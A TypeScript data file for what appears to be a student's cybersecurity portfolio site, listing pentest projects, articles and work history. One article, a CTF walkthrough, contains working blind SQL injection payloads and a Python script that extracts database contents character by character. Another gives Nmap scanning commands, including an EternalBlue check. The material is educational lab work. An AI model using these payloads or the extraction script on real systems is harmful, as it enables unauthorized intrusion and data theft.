import type { Project, Article, WorkExp } from "@/types";

export const PROJECTS: Project[] = [
  {
    id: "web-app-pentest",
    title: "Web Application Penetration Test",
    summary: "Full black-box pentest of a DVWA instance. Found and exploited SQL injection, XSS, CSRF, and file upload vulnerabilities. Produced a professional findings report.",
    description: "Conducted a structured penetration test following PTES methodology against DVWA.\n\n**Scope:** Full black-box assessment — Apache/PHP/MySQL stack.\n\n**Methodology:**\n1. Reconnaissance — Gobuster directory enum, Nmap fingerprinting\n2. Scanning — Nikto baseline, manual Burp Suite crawl\n3. Exploitation — SQL injection, XSS, CSRF bypass, file upload to RCE\n\n**Key Findings:**\n- SQL Injection in login form (auth bypass + data exfiltration)\n- Stored XSS in guestbook (session hijacking PoC)\n- CSRF on password change (no token validation)\n- File upload bypass leading to PHP webshell and RCE",
    tags: ["Web Security", "OWASP Top 10", "Burp Suite", "SQL Injection", "XSS"],
    tools: ["Burp Suite", "Nmap", "Gobuster", "Nikto", "Python"],
    vulnerabilities: [
      "SQL Injection — authentication bypass + data exfiltration",
      "Stored XSS — session hijacking PoC",
      "CSRF — password change with no token validation",
      "Unrestricted File Upload — Remote Code Execution",
    ],
    lessons: "Manual testing consistently finds what automated scanners miss. Understanding the application business logic before touching any tool is the highest-value time investment on any engagement.",
    githubUrl: "https://github.com/masterpillow/web-pentest-lab",
    featured: true,
    date: "Jan 2026",
  },
  {
    id: "recon-toolkit",
    title: "Network Reconnaissance Toolkit",
    summary: "Python automation script combining Nmap scanning, service enumeration, and Shodan API lookups. Cuts recon time by 60% and generates structured HTML reports.",
    description: "Built a modular Python recon toolkit to automate the first phase of any pentest.\n\n**Features:**\n- Nmap wrapper with configurable scan profiles\n- Shodan API integration for passive recon\n- DNS enumeration via dnspython\n- JSON export and auto-generated HTML reports\n\n**Architecture:** CLI tool with argparse, async scanning via asyncio, report templating via jinja2.",
    tags: ["Python", "Nmap", "Shodan API", "Automation", "Recon"],
    tools: ["Python 3", "Nmap", "Shodan API", "dnspython", "jinja2"],
    lessons: "Passive recon via Shodan reveals attack surface without alerting IDS. Always exhaust OSINT before touching the target network.",
    githubUrl: "https://github.com/masterpillow/recon-toolkit",
    featured: true,
    date: "Nov 2025",
  },
  {
    id: "ctf-buffer-overflow",
    title: "CTF: Stack Buffer Overflow Exploit",
    summary: "HackTheBox Pwn challenge — full exploit from checksec to shell. Covers GDB analysis, offset calculation, and shellcode injection with pwntools.",
    description: "Solved a classic stack-based buffer overflow Pwn challenge on HackTheBox.\n\n**Environment:** 32-bit ELF — no canary, no PIE, NX disabled.\n\n**Steps:**\n1. checksec: No canary, No PIE, NX disabled\n2. GDB + PEDA: analyzed stack layout\n3. pattern_create/offset: found at 76 bytes\n4. Located return address and shellcode landing zone\n5. Payload: 76 bytes padding + ret2shellcode via pwntools\n\n**Result:** Remote shell, captured /root/flag.txt.",
    tags: ["Binary Exploitation", "GDB", "pwntools", "Buffer Overflow", "Assembly"],
    tools: ["GDB + PEDA", "pwntools", "Python 3", "checksec", "Ghidra"],
    vulnerabilities: ["Stack Buffer Overflow — no canary, no PIE, NX disabled"],
    lessons: "Understanding memory layout at the assembly level makes buffer overflows intuitive. Always run checksec first — it tells you which mitigations to bypass.",
    githubUrl: "https://github.com/masterpillow/ctf-writeups",
    featured: true,
    date: "Dec 2025",
  },
  {
    id: "password-audit-tool",
    title: "Password Audit Tool",
    summary: "Python tool for auditing password strength against NIST SP 800-63B. Checks HaveIBeenPwned API using k-anonymity and generates compliance reports.",
    description: "Built a password auditing utility for evaluating NIST password guideline compliance.\n\n**Features:**\n- HaveIBeenPwned API check using k-anonymity (no plaintext sent)\n- Pattern detection: keyboard walks, leet substitutions, year suffixes\n- Policy enforcement: length, complexity, history rules\n- Batch CSV input and per-rule compliance report",
    tags: ["Python", "HIBP API", "Password Security", "NIST", "Compliance"],
    tools: ["Python 3", "HaveIBeenPwned API", "hashlib", "argparse"],
    lessons: "The k-anonymity model lets you check passwords against breach databases without sending the actual password — a great example of privacy-preserving design.",
    githubUrl: "https://github.com/masterpillow/password-audit",
    featured: false,
    date: "Oct 2025",
  },
];

export const ARTICLES: Article[] = [
  {
    id: "owasp-broken-access-control",
    title: "OWASP Top 10 Deep Dive: A01 — Broken Access Control",
    summary: "Practical breakdown of the #1 web vulnerability — IDOR, privilege escalation, and force browsing with real-world examples and Burp Suite walkthroughs.",
    tags: ["OWASP Top 10", "Web Security", "Burp Suite", "Access Control"],
    publishedAt: "2026-02-15",
    readingTime: 8,
    content: [
      { type: "p", text: "Broken Access Control ranked #1 in the OWASP Top 10 for 2021 — up from #5 in 2017. It covers situations where users can act outside their intended permissions. This is the most prevalent web application security issue by a wide margin." },
      { type: "h2", text: "What Is It?" },
      { type: "p", text: "Access control enforces policy such that users cannot act outside their intended permissions. Failures lead to unauthorized disclosure, modification, or destruction of data." },
      { type: "h2", text: "Common Vulnerability Patterns" },
      { type: "boldp", text: "**IDOR:** Changing /api/orders/1234 to /api/orders/1235 reads another user's order. The server trusts a user-supplied value without verifying ownership." },
      { type: "boldp", text: "**Missing Function Level Access Control:** Navigating directly to /admin/users without being an admin. The UI hides the link but the route is unprotected." },
      { type: "boldp", text: "**Force Browsing:** Accessing /backup/db.sql directly. Gobuster finds these in minutes." },
      { type: "h2", text: "Demo: Finding IDOR in Burp Suite" },
      { type: "code", text: "1. Intercept /api/profile?id=42 in Burp Suite\n2. Send to Intruder, mark id as payload position\n3. Run number range 1-200\n4. Sort by response length\n5. 200 responses with different content = IDOR confirmed" },
      { type: "h2", text: "Remediation" },
      { type: "p", text: "Enforce access control server-side on every request. Use UUIDs instead of sequential IDs. Implement deny-by-default. Log access control failures and alert on anomalous rates." },
    ],
  },
  {
    id: "nmap-pentest-cheatsheet",
    title: "Nmap for Pentesters: The Commands I Actually Use",
    summary: "Practical Nmap commands for real engagements — scan types, timing templates, NSE scripts, and staying under the radar.",
    tags: ["Nmap", "Recon", "Network Security", "Tools"],
    publishedAt: "2026-01-28",
    readingTime: 6,
    content: [
      { type: "p", text: "Nmap is the first tool I open on any engagement. Here is the exact command set I reach for." },
      { type: "h2", text: "Scan Types Worth Knowing" },
      { type: "boldp", text: "**SYN Scan:** nmap -sS target — stealthy, does not complete TCP handshake. Requires root. Fastest for large networks." },
      { type: "boldp", text: "**TCP Connect:** nmap -sT target — full handshake, works without root, more detectable." },
      { type: "boldp", text: "**UDP:** nmap -sU target — slow but critical. DNS (53), SNMP (161), TFTP (69) all run UDP and are commonly missed." },
      { type: "h2", text: "My Go-To Commands" },
      { type: "code", text: "# Host discovery\nnmap -sn 192.168.1.0/24\n\n# Full port scan\nnmap -p- -T4 target\n\n# Service + version + default scripts\nnmap -sV -sC -p 22,80,443 target\n\n# Everything, save all formats\nnmap -A -T4 -oA recon/target target" },
      { type: "h2", text: "NSE Scripts Worth Running" },
      { type: "code", text: "# EternalBlue check\nnmap --script smb-vuln-ms17-010 target\n\n# Web path enumeration\nnmap --script http-enum target\n\n# Anonymous FTP check\nnmap --script ftp-anon target" },
      { type: "h2", text: "Always Save Output" },
      { type: "p", text: "Use -oA basename every time. It saves all three formats: .nmap (readable), .xml (Metasploit import), .gnmap (greppable). On a real engagement, that output is evidence." },
    ],
  },
  {
    id: "ctf-blind-sqli-manual",
    title: "CTF Walkthrough: Blind SQL Injection Without SQLmap",
    summary: "Step-by-step walkthrough of a blind boolean-based SQLi challenge done manually. Understanding the mechanics before relying on automation.",
    tags: ["CTF", "SQL Injection", "Web Security", "Manual Testing"],
    publishedAt: "2026-01-10",
    readingTime: 12,
    content: [
      { type: "p", text: "SQLmap is excellent — but running it without understanding what it does is a crutch. This covers a blind boolean-based SQL injection challenge done entirely by hand." },
      { type: "h2", text: "The Challenge Setup" },
      { type: "p", text: "A login form with no error messages. You get 'Welcome back' or 'Invalid credentials' — nothing else. Classic blind boolean setup." },
      { type: "h2", text: "Step 1: Confirm the Injection Point" },
      { type: "code", text: "admin' AND '1'='1  ->  Welcome back  (TRUE)\nadmin' AND '1'='2  ->  Invalid       (FALSE)\n\nResponse changes based on boolean. Injection confirmed." },
      { type: "h2", text: "Step 2: Find Column Count" },
      { type: "code", text: "admin' ORDER BY 1--  ->  Welcome\nadmin' ORDER BY 2--  ->  Welcome\nadmin' ORDER BY 3--  ->  Error\n\nResult: 2 columns." },
      { type: "h2", text: "Step 3: Extract Data Character by Character" },
      { type: "code", text: "-- Is first char of DB name > 64 (ASCII)?\nadmin' AND ASCII(SUBSTRING((SELECT database()),1,1))>64--\n\n-- Binary search narrows to exact value\n-- Repeat for each character position" },
      { type: "h2", text: "Step 4: Automate with Python" },
      { type: "code", text: "import requests\nURL = 'http://target/login'\n\ndef extract_char(pos, query):\n    lo, hi = 32, 126\n    while lo < hi:\n        mid = (lo + hi) // 2\n        payload = f\"admin' AND ASCII(SUBSTRING(({query}),{pos},1))>{mid}-- -\"\n        r = requests.post(URL, data={'username': payload, 'password': 'x'})\n        lo = mid + 1 if 'Welcome' in r.text else hi\n    return chr(lo)\n\ndb = ''.join(extract_char(i+1, 'SELECT database()') for i in range(10))\nprint('DB:', db)" },
      { type: "h2", text: "Why Do This Manually First?" },
      { type: "p", text: "When a WAF blocks SQLmap or engagement rules prohibit automated tools, manual exploitation is the only path. Knowing the mechanics means you can adapt payloads on the fly." },
    ],
  },
];

export const WORK: WorkExp[] = [
  {
    id: "athlete",
    role: "Division I Student Athlete",
    org: "University Athletic Program",
    start: "2022-09",
    current: true,
    points: [
      "Balanced a full Division I schedule with rigorous CS coursework — developed time management and performance-under-pressure skills directly applicable to incident response.",
      "Operated in team environments built on trust, communication, and coordinated strategy — foundational for red team operations.",
      "Maintained academic standing while competing at an elite level, demonstrating persistence and discipline that security research demands.",
    ],
    tags: ["Leadership", "Teamwork", "Discipline", "Time Management"],
  },
  {
    id: "helpdesk",
    role: "IT Help Desk Technician",
    org: "University IT Department",
    start: "2023-09",
    end: "2024-05",
    current: false,
    points: [
      "Provided first-line technical support for 500+ faculty and students — resolved hardware, software, and network connectivity issues daily.",
      "Gained hands-on experience with Active Directory user management, VPN troubleshooting, and endpoint security configurations.",
      "Identified and escalated a phishing campaign targeting student accounts, contributing to the department's incident response.",
    ],
    tags: ["Active Directory", "Networking", "Endpoint Security", "Incident Response"],
  },
  {
    id: "coursework",
    role: "Cybersecurity Coursework",
    org: "Computer Science Department",
    start: "2022-09",
    current: true,
    points: [
      "Completed Network Security, Cryptography, Operating Systems, and Data Structures with security-focused lab components in each course.",
      "Built hands-on skills through packet analysis with Wireshark, encryption implementation, and vulnerability scanning exercises.",
      "Currently enrolled in Advanced Security Concepts covering penetration testing methodology, malware analysis, and incident response.",
    ],
    tags: ["Network Security", "Cryptography", "Operating Systems", "Pentesting"],
  },
];
